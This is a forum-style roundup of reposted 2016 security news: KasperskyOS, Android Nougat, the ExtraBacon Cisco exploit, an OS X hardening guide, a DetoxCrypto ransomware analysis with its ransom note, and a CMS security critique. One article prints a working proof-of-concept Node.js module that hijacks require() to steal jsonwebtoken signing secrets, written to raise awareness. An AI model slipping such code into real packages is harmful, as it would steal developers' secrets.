Nytro

Kaspersky a făcut propriul sistem de operare by unacomn on 24/08/2016 Pentru cea mai mare parte a ultimilor ani nu au fost chiar atât de multe sisteme de operare, cel puțin nu în ceea ce privește tehnologia pe care sunt bazate. Realizarea unuia de la zero este un proces lung și dificil, așa că nu apar peste noapte. Dar după patru ani de muncă, Kaspersky pare să fi realizat unul. Kaspersy Labs a realizat propriul sistem de operare, KasperskyOS, construit de la zero folosind tehnologie proprie, fără să fie bazat pe Unix, Linux, Windows sau orice alt software deja existent. Sistemul de operare a fost făcut cu siguranță în minte, motiv pentru care prima sa aplicație este în routerele făcute de compania Kraftway, menite pentru sectorul industrial, instituții guvernamentale, spitale și învățământ. Fiind construit pe tehnologie complet nouă, KasperskyOS nu este atât de vulnerabil din start, iar principiile pe care a fost făcut încearcă să reducă impactul pe care îl poate avea un atac de malware asupra sistemului. Ca să nu mai spunem de beneficiile pe care le aduce lipsa unui backdoor care ar putea sau nu să fie prezent de ani de zile în fiecare alt sistem de operare. Sistemul de operare nu permite proceselor care rulează să comunice în mod anonim, nu le permite să încalce care le-a fost atribuit de politica de securitate și în general este făcut să nu lase malware să o ia razna, chiar și dacă reușește să se instaleze. Detalii complete despre acest sistem de operare ar trebui să fie disponibile în viitorul apropiat. Dacă vreți să aflați mai multe despre tehnologie, puteți arunca o privire peste planul general de acum câțiva ani. Nu se știe dacă va exista o variantă și pentru desktop, dar având în vedere cât de mulți fani are Microsoft în Rusia și restul lumii, de când cu Windows 10, nu este exclusă posibilitatea ca acest KasperskyOS să ajungă și pe PC-uri cândva. Nu de îndată, pentru că transformarea unui sistem de operare specializat într-unul pentru utilizatorul de rând este un proces mai dificil, după cum tot demonstrează și Linux, dar cândva. [The Register] Sursa: https://zonait.tv/kaspersky-a-facut-propriul-sistem-de-operare/

Zeljka Zorz - Managing EditorAugust 23, 2016 Android 7.0 Nougat is out, with new security features Google has released Android 7.0 Nougat, and the newest version of the popular mobile OS is already being rolled out to Google’s existing Nexus devices. “Today, and over the next several weeks, the Nexus 6, Nexus 5X, Nexus 6P, Nexus 9, Nexus Player, Pixel C and General Mobile 4G (Android One) will get an over the air software update to Android 7.0 Nougat. Any devices enrolled in the Android Beta Program will also receive this final version,” Sameer Samat, VP of Product Management, Android & Google Play, explained on Monday. The LG V20, to be released in September, will be the first smartphone to come equipped with Android Nougat right out of the box. New Android 7.0 Nougat security features The new OS version brings many changes, including new security features for individual and enterprise users. Google is set to release newer Nexus devices in the fall. For them, new features will include seamless updates, file-based encryption, and Direct Boot. Direct Boot is meant to help apps run securely even before users unlock their device when the device reboots. If the reboot happens and users don’t notice (and therefore aren’t logged in), Secure Boot will make sure that the apps start working as soon as the phone finishes booting (i.e. before users sign in). For more details about the feature, go here and here. By encrypting at the file level, Nougat will better isolate and protect files for individual users on their device. “New Android devices with Nougat can install software updates in the background which means you won’t have to wait while your device installs the update and optimizes all your apps for the new version,” Samat explained. Current Nexus users won’t get seamless updates, but Google promises that Android Nougat will bring them faster software update installs. Nougat also comes with restricted permission sharing between apps, restricted manoeuvring space for apps with device admin permissions (they can’t change users’s PIN or passwords) and more user control over this type of apps (users will be able to easily uninstall them. For enterprise users, Nougat will bring the “always-on VPN” feature, which will enforce secure connections and sharing; a better and cleared separation between private and work-specific Android profiles; a new QR code-based device provisioning option; and more. As always, users will be able to peruse and set the optional security features through the device’s Settings app. Sursa: https://www.helpnetsecurity.com/2016/08/23/android-7-0-nougat-security-features/

NSA-linked Cisco exploit poses bigger threat than previously thought With only a small amount of work, ExtraBacon will commandeer new versions of ASA. DAN GOODIN - 8/23/2016, 9:09 PM Enlarge Recently released code that exploits Cisco System firewalls and has been linked to the National Security Agency can work against a much larger number of models than many security experts previously thought. An exploit dubbed ExtraBacon contains code that prevents it from working on newer versions of Cisco Adaptive Security Appliance (ASA), a line of firewalls that's widely used by corporations, government agencies, and other large organizations. When the exploit encounters 8.4(5) or newer versions of ASA, it returns an error message that prevents it from working. Now researchers say that with a nominal amount of work, they were able to modify ExtraBacon to make it work on a much newer version. While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed. SilentSignal The newly modified exploit is the work of SilentSignal, a penetration testing firm located in Budapest, Hungary. In an e-mail, SilentSignal researcher Balint Varga-Perke wrote: We first started to work on the exploit mainly to see how easy it would be to add support for other (newer) versions. Turns out it is very easy, that implies two things: The leaked code is not as poor quality as some might suggest The lack of exploit mitigation techniques in the target Cisco software makes the life of attackers very easy FURTHER READING Cisco confirms NSA-linked zeroday targeted its firewalls for years As Ars previously reported, the zero-day exploit allows remote attackers who have already gained a foothold in a targeted network to take full control of a firewall. It was one of more than a dozen highly advanced attacks that was part of a mysterious leak by a previously unknown group calling itself the ShadowBrokers. Researchers say digital fingerprints left inside the code all but prove the attacks belonged to the Equation Group, an elite hacking crew with ties to the NSA-sponsored Stuxnet and Flame malware that targeted Iran and the Middle East. Michael Toecker, an engineer at a firm called Context Industrial Security, has analyzed ExtraBacon and found that it was designed to work only with versions 8.4(4) and earlier of ASA. He provided the following screenshot to illustrate the restrictions. Enlarge Michael Toecker FURTHER READING How “omnipotent” hackers tied to NSA hid for 14 years—and were found at last The success of the modified exploit "demonstrates just how persistent a vulnerability in code can be, how it moves into new versions unless it's found and eradicated," Toecker told Ars. "I don't know who built ExtraBacon, but thousands of users in the US are now vulnerable to the same exploit because nobody told Cisco their SNMP code was busted, and the vulnerable code continued into later versions." Toecker went on to say that the vulnerability of later ASA versions likely didn't take Cisco by surprise. Near the bottom of a post that Cisco published last week in response to the ShadowBrokers leak, the company's principal engineer, Omar Santos, reported that ExtraBacon caused ASA version 9.4(1) to seize up and stop working. Such crashes are often the first sign of a bug that, when properly exploited, allows an attacker to remotely execute malicious code. Cisco engineers have released software that allows ASA customers to detect and stop ExtraBacon-powered attacks, but the company has yet to actually patch the underlying bug. The ShadowBrokers release means that advanced attacks can be carried out by a much wider base of hackers than would normally be possible. "We have test equipment and custom firmware images that make debugging easier," Varga-Perke of SilentSignal said. "These are most likely available for malicious parties, too; we are quite confident that similar code exists in private hands." As Ars and Cisco have noted previously, the ExtraBacon exploit requires attackers to already have compromised parts of a targeted network. That requirement and the bar Varga-Perke described for modifying ExtraBacon means it's probably prohibitively difficult for script kiddies to exploit newer versions of ASA. Still, for more talented hackers, there's no longer any debate. People running ASA should make sure they've installed last week's exploit signature and the upcoming patch as soon as it's available. DAN GOODINDan is the Security Editor at Ars Technica, which he joined in 2012 after working for The Register, the Associated Press, Bloomberg News, and other publications. EMAIL dan.goodin@arstechnica.com // TWITTER @dangoodin001 Sursa: http://arstechnica.com/security/2016/08/nsa-linked-cisco-exploit-poses-bigger-threat-than-previously-thought/

Linux at 25: An ecosystem, not only an OS Credit: PCbots InfoWorld celebrates the 25th birthday of Linux -- and the new generation of open source projects Linux enabled InfoWorld | Aug 22, 2016 I discovered Linux the way most people did, through word of mouth in the 1990s, when rumors spread of a free "hobbyist" OS designed to run on x86 PCs. For the first decade of Linux's 25 years, Linux was largely a curiosity outside of its core community. I'm proud to say InfoWorld was among the first publications to take Linux seriously, culminating in a January 2004 review entitled "Linux 2.6 scales the enterprise." In it, InfoWorld contributing editor Paul Venezia issued a fateful warning: "If commercial Unix vendors weren’t already worried about Linux, they should be now." [ InfoWorld celebrates Linux at 25: Containers and unikernels prove less is more. | Quick guide to Linux admin essentials. | Stay up on open source with theInfoWorld Linux report. ] Today Linux has expanded far beyond its conquest of the server market. If you include Android, which is built around the Linux kernel, not to mention embedded Linux devices from TVs to network switches, you're talking billions of instances. This week on InfoWorld, you'll see a string of articles celebrating Linux, including a feature article from Paul, plus his interview with Linux creator Linus Torvalds. Those two stories will run on Aug. 25 -- the same date on which Torvalds first announced Linux in 1991. Over the years, Linux has grown in another way: The sheer scale of its community development operation. Jim Zemlin, executive director of the Linux Foundation, recently offered me some awe-inspiring stats: There are 53,000 source files in the Linux kernel, 21 million lines of code. There are 3,900 developers from all around the globe, 10,800 lines of code are added, 5300 lines of code are removed and 1,800 lines of code are modified every single day in the Linux kernel. It changes seven, eight times an hour on average, every day, 365 days a year. That is a prolific, tremendous scale that is just unparalleled in the history of software development. That's the kernel alone. Zemlin reminds us that the versioning and repository system Git, on which GitHub is based, was created by Torvalds to help manage this massive development effort. Each rev of the kernel, offered under the GPLv2 license, flows to the multitude of Linux distributions, the providers of which are responsible for the customer experience. Given that Linux providers pay nothing for the kernel, how does Torvalds earn a living? He's an employee of the Linux Foundation, as is a coterie of core contributors and administrators, but they're far outnumbered by a much larger group of dedicated developers employed by familiar names: Intel, Red Hat, Samsung, Suse, IBM, Google, AMD, and many more. This consortium supplies both monetary support to the Foundation and millions of lines of code to the Linux project. Although Torvalds technically reports to Zemlin, the latter invokes his daughter to describe their relationship: "Like my daughter, who shares a lot in common with Linus, they’re both adorable, they both are brilliant, and neither of them listens to anything I say." As you can tell, Zemlin likes to minimize his own role, going as far as to say, "I'm just the janitor keeping the wheels turning." But it's impossible to ignore the growing importance of the Foundation itself -- and its 50 open source projects beyond the Linux kernel, a number of them vital to the future of enterprise computing. Take the Linux Foundation's Open Container Initiative (OCI). It's fair to say that no new enterprise technology over the past couple of years has had a greater impact than Docker packaging for Linux containers, and the OCI is the cauldron where those specs are being hashed out. Alongside the OCI, the Cloud Native Computing Foundation promises to harmonize container management and orchestration solutions for the next-gen enterprise cloud, with Google's red-hot Kubernetes at the core. Zemlin is particularly excited by the Foundation's new, fast-growing Hyperledgerproject, a blockchain-based initiative to create an open, enterprise-grade distributed ledger system for all sorts of transactions. "Blockchain has the potential to change the nature of trusted transactions on the internet," he says. "Beyond that, it’s a security modality for connected devices where you have a trusted, immutable record of cryptographically secure trust on the internet. It’s a huge project." The sheer breadth of open networking projects also demands attention. Together you can view them as circumscribing the future of networking: OpenDaylight,Open Network Operating System, Open Orchestrator Project, Open Platform for NFV, Open vSwitch, and OpenSwitch. As Linux turns 25, it's worth pondering not only the impact of the endlessly morphing, proliferating OS itself, but its role in legitimizing open source and elevating it to the point where, today, it has become ground zero for technology development. Linux has its rich ecosystem of contributors, providers, and users of all stripes. But around that, supported by the Linux and Apache Foundations and others, a vast constellation of auspicious open source projects has arisen, each with its own potential to shake up enterprise computing. Rather than wandering in the wilderness for a decade, the best of them are already being taken seriously. Eric Knorr — Editor in Chief Eric Knorr is the editor in chief for InfoWorld and has been with the publication since 2003. Eric has received the Neal and Computer Press Awards for journalistic excellence. Sursa: http://www.infoworld.com/article/3109891/linux/linux-at-25-an-ecosystem-not-only-an-os.html

Table of Content Introduction Authentication Ensure Security of Standard and Default Accounts Users Privilege Separation Ensure Password Security Enforce Password Security Two Factor Authentication Automatic Login and User Lists Guest Accounts Restrict Sudoers file Automatically Lock the Login Keychain General Configuration Gatekeeper Disable Diagnostics Disable Handoff Tracking Services FileVault Firewall Require Administrator Password Screensaver and Un-locking Filename Extensions System Updates Prevent Safari from Opening Known File Types Set Strict Global Umask Technical Configuration Disable Bluetooth Firmware Password Setuid and Setgid Disable Core Dumps Network and Communication Security Advanced Firewall Disable Wake on Lan Disable Apple File Protocol (AFP) Disable Unnecessary Services Disable Sharing Harden TCP/IP Kernel Parameters Enable Network Time Synchronization via NTP Disable Bonjour (mDNS) Recommended Applications Little Snitch Micro Snitch BlockBlock Lockdown RansomWhere? Dylib Hijack Scanner Lynis Introduction ERNW has compiled the most relevant settings for OS X 10.11 El Captain into this compilation of security recommendations. This document is supposed to provide a solid base of hardening measures to enhance the system security and still remaining commonly applyable. Settings which might have severe impact on the functionality of the operating system and need a lot of further testing are not part of this checklist or marked as optional. We have marked each recommended setting in this checklist either with “mandatory” or “optional” to make a clear statement, which setting is a MUST (mandatory) or a SHOULD (optional) from our point of view. “Optional” also means that we recommend to apply this setting, but there may be required functionality on the system that will become unavailable once the setting is applied. Important: This Guide will force you to Disable SIP (System Integrity Protection) a few times. After the hardening is done, please make sure you enable SIP again. Articol complet: https://github.com/ernw/hardening/blob/master/operating_system/osx/10.11/ERNW_Hardening_OS_X_EL_Captain.md

New DetoxCrypto Ransomware pretends to be PokemonGo or uploads a Picture of your Screen By Lawrence Abrams A new ransomware called DetoxCrypto has been discovered by MalwareHunterTeam that is currently being distributed under two different variants. The first variant looks like a generic ransomware but contains the interesting feature of taking a screenshot of your acting Windows screen when it is installed. The second variant is trying to take advantage of the immense popularity of PokemonGo, by hoping to trick people into installing it. This ransomware appears to be either part of an affiliate system or being sold on darkweb sites as we are seeing different variants, with different themes, email addresses, and features. For example, one variant has a Pokemon theme, while another has a more generic ransom note, but takes a picture of your active Windows screen when it is installed. All variants will encrypt your data using AES encryption, stop MySQL and MSSQL services, display a ransom note/lock screen, and play an audio file while the lock screen is showing. In order to pay the ransom, victims are instructed to contact an email listed in the lock screen for payment instructions. Anatomy of the DetoxCrypto Ransomware It is currently not known how this ransomware is distributed, but so far the variants we have observed all use a single distributed executable that contains other executables and files embedded within it. When the main distribution executable is run, it will extract a file called MicrosoftHost.exe, an audio file, a wallpaper background, and a third executable, whose name varies per variant of DetoxCrypto. The MicrosoftHost.exe executable performs the actual encryption of the drive and stop the database servers on the victim's computer. When encrypting files it will not append a different extension to it. It will also configure the Windows desktop background to use the embedded image file that is extracted. The third file, which we have seen named Calipso.exe and Pokemon.exe, display the lock screen, play an audio file, and provide the ability to decrypt a victim's file if the correct password is entered. This file appears is not static between each variant that we noticed, so it is possible that different distributors customize this file to perform their own desired tasks. The two different variants we have seen so far is a Pokemon theme and a generic looking looking one, with an interesting screen capture routine. Both of these are described further below. Calipso Variant The Calipso variant of DetoxCrypto was discovered by Intel security researcher Marc Rivero López, When run it will extract numerous files to the C:\Users\[account_name]\Calipso folder as shown below. Calipso Folder The ransomware will then encrypt the victim's computer, display a lock screen, and play some music. The lock screen will instruct the victim to email motox2016@mail2tor.com in order to get payment instructions. A video of the lock screen and audio can be seen above. When this ransomware is executed, it will also take a screenshot of the active screen and upload it to the developer. Screen capture function It is possible that based on what is contained in the screenshot, the ransomware developer may try to increase the price of the ransom if the image contains blackmail worthy content. We are all Pokemons Variant Pokemon Background The Pokemon themed variant of DetoxCrypto is distributed as an executable called Pokemongo.exe. When executed the ransomware will extract numerous files to the C:\Users\[account_name]\Downloads\Pokemon folder as shown below. Pokemon Folder The ransomware will then encrypt the victim's computer, display a lock screen, and play some music. The text of the lock screen is: We are all Pokemons YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED AND A UNIQUE UNLOCK KEY IS GENERATED !! YOU CAN ONLY UNLOCK YOUR FILES BY BUYING THIS KEY FROM US, THERE IS NO OTHER WAY TO SAVE OR UNLOCK YOUR FILES !! HOW TO UNLOCK MY FILES ? You need to send 2 Bitcoins to our Bitcoin Wallet address. To get the Wallet address contact us at : contact365@mail2tor.com WE RECOMMEND TO BUY BITCOINS HERE : WWW.LOCALBITCOINS.COM Register and buy Bitcoins with PayPal, Skrill or find someone who sells Bitcoins Locally by entering your City and select CASH in person as Your paying option. TO SAVE TIME YOU CAN GIVE THE SELLER OUR BITCOIN ADDRESS AND HE CAN SEND THE BITCOINS TO US DIRECTLY. AFTER WE RECEIVE THE PAYMENT WE WILL SEND YOU THE UNLOCK KEY TO THE EMAIL YOU CONTACTED US FROM. ** Act fast because ALL YOUR FILES WILL BE DELETED IN 96h ** ** IF YOU DELETE THIS PROGRAM ALL YOUR FILES WILL BE DELETED FOREVER ** The lock screen for this variant can be seen below. Caption LAWRENCE ABRAMS Lawrence Abrams is the creator and owner of BleepingComputer.com. Lawrence's area of expertise includes malware removal and computer forensics. Lawrence Abrams is a co-author of the Winternals Defragmentation, Recovery, and Administration Field Guide and the technical editor for Rootkits for Dummies. Sursa: http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/

One easy way to inject malicious code in any Node.js application Posted on August 22, 2016 tl;dr This article describes a method of injecting arbitrary code in Node.js modules. It does not encourage unethical behavior. The chain used to include instances of modules can be tampered to allow modification of required dependencies. Knowing this fact, a malicious attacker would be able to craft a module that can modify legitimate code. This malicious code could then be shipped as part of a widely used module on the NPM registry and any `require` call made after the first instantiation of the malicious module would be vulnerable to a potential code injection. However, the method described in this article can also be used legitimately in some situations such as code coverage calculation, mocking or instrumentation. Programmers have to take the time to look at the sources of 3rd party libraries they are using in order to know what to expect. Definitions “require chain”: the code executed between a call to the `require` function and the return statement of this function. “module”: a set of code that can be instantiated in a runtime using the `require` function “core module”: a module available from the Node.js standard library. “external module”: a module downloaded from a registry such as NPM. “internal module”: a module existing only from within the current project and instantiated using `require` and relative or absolute path to the module’s location. “main module”: the entry point of a Node.js application. It is the file passed as an argument to the `$ node` executable. Introduction I have recently been given the task of finding a way to instrument all functions declared within a Node.js application. I came up with the following approaches: Create an addon to V8 to track all functions. Add hooks to any method that triggers asynchronous operations, and update the code before its execution. Change the behavior of the `require` function to patch code at instantiation time. The first method would require a fair amount of low-level programming and would probably not be portable to other Node.js runtimes such as ChakraCore. Hooking all asynchronous core methods is definitely possible (it will be even easier in the future with the release of “async_wrap” by the tracing working group.) However, if the behavior of a code chunk is modified, the modification needs to be reapplied each time the chunk is seen in the event queue which could lead to severe performances loss. Hijacking the require chain is not common, but there are still quite a few modules that use this strategy. How it works is that all modules required through `require` are patched at instantiation time. The major drawback of this method is that the main module of the application can’t be instrumented. I decided to go with hijacking the require chain, since it has the least disadvantages, and another solution would be attempted later for instrumenting of the main module. The require chain The Node.js require chain is based on the core module named “Module”. A simplified view of the require chain Modules name can represent one of three things: core module name the name of a module in the path (i.e. within the “node_modules” directory) a relative path to a local file There are also three outcomes to a successful call to `require`: the module is already cached, so the cached version is returned. Because of this, calls to `require` are singletons. the module is a core module, so a precompiled version is returned. (core modules have their own cache space) the module is not in the core, so the “_compile” method will run the code from the required file using the core module named “vm”, cache the result, and return it. Hijacking the require chain The require chain can be hijacked in various locations. I decided to do it at the “_compile” level, and have released a module called “compile-hook”. Its source code is pretty simple and can be found here: 'use strict'; const Module = require('module'); const originalCompile = Module.prototype._compile; const nohook = function (content, filename, done) { return done(content); }; let currentHook = nohook; Module.prototype._compile = function (content, filename) { const self = this; currentHook(content, filename, (newContent) => { newContent = newContent || content; originalCompile.call(self, newContent, filename); }); }; const placeHook = function (hook) { currentHook = hook; }; const removeHook = function () { currentHook = nohook; }; module.exports.placeHook = placeHook; module.exports.removeHook = removeHook; view rawcompile-hook.js hosted with by GitHub The “_compile’ method is monkeypatched to add a transformation step to the code before instantiation. Injecting malicious code The “jsonwebtoken” module is a pretty popular package for managing authentication with JWT, so we will use it as an example to demonstrate how we can to inject code into this module to steam the secret keys used to sign tokens. Here is a simple malicious module I created earlier: 'use strict'; const Hook = require('compile-hook'); const Acorn = require('acorn-jsx'); const Falafel = require('falafel'); const hijack = function (script) { return Falafel(script, { parser: Acorn }, function (node) { if (node.type === 'AssignmentExpression' && node.source().includes('module.exports')) { node.update('var hackerStream = new require(\'stream\').PassThrough();\n' + node.source() + '\nmodule.exports.hackerStream = hackerStream;' + '\n'); } if (node.source() === 'options = options || {};') { node.update(node.source() + '\n' + 'hackerStream.push(secretOrPrivateKey)'); } }); }; Hook.placeHook((content, filename, done) => { if (filename.includes('/sign.js')) { done(hijack(content)); } else { done(); } }); const jwt = require('jsonwebtoken'); jwt.sign.hackerStream.on('data', (raw) => { console.log('secret', raw.toString()); }); view rawexploic.js hosted with by GitHub And an example of an unfortunate victim application: 'use strict'; require('@vdeturckheim/exploic'); const jwt = require('jsonwebtoken'); const token = jwt.sign({ foo: 'bar'}, 'shhhhh'); console.log(token); view rawvictimpoc.js hosted with by GitHub The output of this app is as follows: $ node index.js secret shhhhh eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJpYXQiOjE0NjQ4OTQ5Mjh9.LvIWJiFCamu8azvnNgh8VvleVZUETNvDZRon1tKBImU As you can see, the secret key given to the `sign` function is intercepted by the malicious module and printed to the console. secret shhhhh We merely display the secret here, but a real malicious script could post the secret keys to a remote server such as Pastebin. Conclusion Regarding the Sqreen Node.js agent, I ended up using a slightly different strategy than the one described in this article: the exported methods of the instrumented modules are not modified but wrapped. The wrapper is given the responsibility of the instrumentation and the original code stays untouched. This article is mainly aimed at raising awareness within the Node.js community of this potentially malicious technique. We demonstrate that hijacking the require chain is pretty easy, and can lead to severe security issues in Node.js applications. Even if countermeasures are created, programmers should always take the time to manually look at the source code of any external dependencies they download from public registries. Any time source code or executable binary data is downloaded and run on a machine, it can potentially lead to security issues. Some modules hijack the require chain for legitimate reasons. For instance: “njsTrace” instruments function calls this way. the “lab” test runner uses this method to compute code coverage. There is no easy way to prevent this technique from being used, the only simple solution is to carefully review each dependency and wisely choose which third party modules you use in your projects. Feel free to send me any comments and remarks regarding this article. We are also soon releasing our private beta for Sqreen! Please let me know if you’re interested in being a beta tester. Thanks for reading, Vladimir Vladimir is a software engineer at Sqreen.io with a background in cyber-security. He is involved in diverse open-source projects in JavaScript (mostly within the hapijs project) and has recently contributed to the Node.js core. He is currently working at Sqreen and is responsible for the Node.js instrumentation. Sursa: https://blog.sqreen.io/one-easy-way-to-inject-malicious-code-in-any-node-js-application/?utm_source=social&utm_medium=twitter&utm_campaign=sumome_share

On the (in)security of popular open source Content Management Systems written in PHP August 24, 2016 3:02 am by P.I.E. Staff Community Our previous post included a checklist comparing CMS Airship (our Free Software CMS platform designed with security in mind) to the three most popular content management systems currently in use on the Internet: WordPress (26.6% of all websites) Joomla (2.8% of all websites) Drupal (2.2% of all websites) The checklist compared out-of-the-box security properties (features or design decisions that affect the security of the software and any extensions developed for it) rather than what's possible with community-provided extensions. Tooltips were also provided on individual cells to clear up any confusion on why we did or did not award a checkmark to a given project for a given security property. Since the previous post was published, several technologists asked us to explain the individual security deficits of other PHP content management systems in detail. Some of these are straightforward (e.g. WordPress doesn't offer encryption, so there's nothing to analyze), but others require a careful eye for code auditing. Familiarity with PHP security is also greatly beneficial to understanding, although we will attempt to explain each item in detail. We're going to set Airship aside for the remainder of this post. All you need to know is Airship met all of the criteria for a secure-by-default content management system. If you'd like to learn more aboutAirship's security features, we've covered this in detail here. WordPress, Joomla, and Drupal: The Good Parts All three content management systems score points for being Free Software, released under the GNU Public License. Consequently, their source code is available for their users to inspect and analyze. This offers three benefits: Independent security experts can assess the security of their offering and, with source code citations to prove their arguments, explain what's secure or insecure. Independent security experts can take their findings and offers better ways to improve the security of their software. You have the ability to run a copy of the software that you've verified to be known-good. For example, last year, we made WordPress's wp_rand() function cryptographically secure as of WordPress 4.4.0. This would not have been possible without the first two properties. In addition to being open source, all three provide a security mechanism to mitigate Cross-Site Request Forgery attacks. We didn't include whether or not plugins/extensions fail to utilize the CSRF mitigation feature in our analysis. If you're using a third-party plugin, don't assume that CSRF vulnerabilities can't or won't happen to your application just because there's a mitigation feature in the core. Drupal: Context-Aware Output Escaping The correct way to prevent cross-site scripting vulnerabilities is to escape data on output, not on input. Escaping on input can lead to bizarre exploitation strategies, e.g. WordPress's stored XSS vulnerability enabled by MySQL column truncation. You should be saving the original, unaltered copy of any data in case you need to update your escaping strategy to prevent a filter bypass. Escaping on output allows you a measure of agility that input escaping does not. You may, however, cache the escaped data for subsequent requests to improve your application's performance. The latest versions of Drupal got this right, and should be commended for it. Joomla: Secure Password Storage and Two-Factor Authentication Out of the three, Joomla is the only CMS that leverages PHP's native password hashing features. This means that cracking the passwords stored in a modern Joomla app is nontrivial, should one ever be compromised. Additionally, Joomla now provides two-factor authentication out-of-the-box, which helps mitigate the consequences of weak user passwords. Joomla: Secure PHP Encryption In response to our security advisory about JCrypt's design flaws last year, the Joomla team adoptedDefuse Security's secure PHP encryption library (version 1.2.1) instead. While version 2 offers significant improvements over version 1, there are no known security vulnerabilities in that version of Defuse Security's PHP encryption library. The Bad and the Ugly Security Deficits in WordPress's Core WordPress Automatic Updates Are Not Secure WordPress is the only one of the big three content management systems that offers automatic updates, but it does so insecurely. In order to have secure automatic updates, you need to have a secure code delivery system in place. Secure code delivery has three properties: Cryptographic signatures: The deliverable was signed by a private key and you can verify the signature with the corresponding public key. Reproducible builds: You can reproduce the deliverable from the source code. Userbase consistency verification: Everyone gets the same thing. Implementations involve append-only data structures, such as Merkle trees, which are also used in certificate transparency and Bitcoin. WordPress's automatic updates are not cryptographically signed with (an offline) private key. This means if an attacker can compromise their update servers and upload a malicious download, they can install a trojan on 26.6% of the websites on the Internet. The consequences of a compromise of this magnitude cannot be understated. Such an attack could enable financial information fraud and distributed denial of service attacks on a scale we've never seen before, and that our systems are almost certainly incapable of enduring. Nothing stops an attacker from silently distributing malware through a compromised update server only to targets of interest, since there are no userbase consistency verification protocols in place either. However, given that WordPress is open source and PHP is an interpreted language, it's fair to give them credit for reproducible builds. WordPress Does Not Use Prepared Statements Many WordPress users are surprised to learn that WordPress doesn't use prepared statements, given the existence of wpdb::prepare(). To understand what's going on, you first need to know what prepared statements actually do: The application sends the query string (with placeholders) to the database server. The database server responds with a query identifier. Some servers allow you to cache and reuse query identifiers for multiple prepared queries to reduce round trips. The application sends the query identifier and the parameters together to the server. The reason this is a security boon over escape-then-concatenate is that the query string is never tainted by the parameters. They're sent in separate packets. This is an important distinction;Unicode-based hacks to bypass mysql_real_escape_string() are dead on arrival when prepared statements are used. What WordPress's wpdb::prepare() does instead of prepared statements is escape-then-concatenate. WordPress Salted MD5 for Password Hashing WordPress users may be surprised to learn that, despite using Phpass (a well-regarded password hashing library written by Solar Designer which offered bcrypt before PHP got a native password hashing API), WordPress doesn't use bcrypt for password storage. To understand why, first pay attention to this code snippet and this one as well. If $this->portable_hashes is set to TRUE, it will call $this->crypt_private() (which uses 8192 rounds of MD5). Where is $this->portable_hashes defined? In the constructor. And, of course, it's always set toTRUE when an object is created in the WordPress core. Consequently, HashPassword can be greatly simplified to the following snippet: function HashPassword($password) { if ( strlen( $password ) > 4096 ) { return '*'; } /* these steps are skipped */ $random = $this->get_random_bytes(6); $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) == 34) return $hash; return '*'; } One reason for this deviation from Phpass was to gracefully handle corner cases where someone downgrades to a version of PHP too old to support bcrypt without losing the ability to verify existing password hashes. Security Deficits in Joomla's Core Joomla Does Not Offer Automatic Updates Joomla doesn't offer automatic security updates. In the event that a security vulnerability is discovered in Joomla and a fix is released, it's up to every individual Joomla site operator to validate and install the update manually. Until the patch is applied, your systems are vulnerable. As a consequence, most Joomla websites still run outdated versions of Joomla. Joomla Doesn't Provide Prepared Statements To reiterate: Prepared statements are a way of interacting with a database that, among other things, makes preventing SQL injection simple while eliminating corner cases. Note: Thanks to Mark Babker, this will be fixed in a future version of Joomla. As of 3.6.2, out of Joomla's database drivers, only the PDO driver attempts to support prepared statements. Unfortunately, it is not successful due to a poorly thought out default setting in PHP itself: In order to use actual prepared statements, you have to disable emulated prepared statements. Instead of this: $pdo = new PDO(/* ... */); Do this: $pdo = (new PDO(/* ... */)) // Turn off emulated prepares. ->setAttribute(PDO::ATTR_EMULATE_PREPARES, false) // Optional, but also recommended: ->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION) ; As long as the developers working with Joomla's PDO database driver take care to disable emulation, Joomla offers prepared statements. However, this security property isn't included out-of-the-box, and as of 3.6.2, doesn't apply to the default MySQLi driver. Joomla Doesn't Employ Context-Aware Output Escaping Modern web applications use templating engines, such as Twig, which provide context-aware output escaping features to mitigate cross-site scripting vulnerabilities. For example, in the following code snippet, user_data.title will be escaped differently thanuser_data.body, particularly with respect to quote characters. <span title="{{ user_data.title|e('html_attr') }}">{{ user_data.body|e('html') }}</span> Instead, Joomla just blacklists HTML tags in an attempt to prevent the low-hanging fruit. Security experts refer to this as enumerating badness, which is listed as one of the six dumbest ideas in computer security. Security Deficits in Drupal's Core Drupal Does Not Offer Automatic Updates Drupal doesn't offer automatic security updates. In the event that a security vulnerability is discovered in Drupal and a fix is released, it's up to every individual Drupal site operator to validate and install the update manually. Until the patch is applied, your systems are vulnerable. This has already happened once before. Possibly due to the existence of a historical precedent, some of the Drupal core members are seriously working towards implementing secure automatic updates into Drupal. We've offered the team members some guidance on how to proceed (i.e. since libsodium isn't currently an option for most of their userbase, they're stuck with RSA signatures, which even developers with cryptography experience frequently implement incorrectly). Drupal Almost Offers Prepared Statements ...except Drupal goes out of its way to use emulated prepared statements instead of actual prepared statements, even though emulated prepared statements suffers from the same fundamental security problem as escaping then concatenating strings. Code and data separation is not upheld. Drupal uses SHA512Crypt which is Sub-Optimal There's minor disagreement among cryptographers about which password hashing functions will remain strong against hash cracking in the coming years. Of all the acceptable options, PBKDF2 is certainly the weakest one, and SHA512Crypt is very similar to PBKDF2-SHA512 for practical purposes. Drupal supports a minimum of PHP 5.5, which means they could just as easily migrate topassword_hash() and password_verify(), since those functions are guaranteed to exist. If PHP adopts Argon2i in a future version, Drupal will automatically support it as soon as it becomes the default, with no further code changes necessary. Everything is Going to Be Okay All of these security flaws baked into the cornerstones of the software that powers one third of websites on the Internet can be very discouraging. Fortunately, most of these problems are fixable. Refer to how we solved each problem in CMS Airship, for example. Unfortunately, there are a lot of nontechnical obstacles in the way of making WordPress, Drupal, and Joomla more secure. WordPress developers proudly boast that WordPress powers 1 in 4 websites, and pride themselves on supporting unsupported versions of PHP as a "usability" feature rather than a security liability that could potentially break the Internet for everyone. At the end of the day, there are two ways to solve this dilemma: Get the core teams for each large CMS project to take security seriously. Migrate towards a CMS project that already takes security seriously. We leave answering which solution is better as an exercise for the reader. We're actively pursuing both goals in the hopes that one will move the needle towards a more secure Internet. Permalink About the Author P.I.E. Staff Paragon Initiative Enterprises Paragon 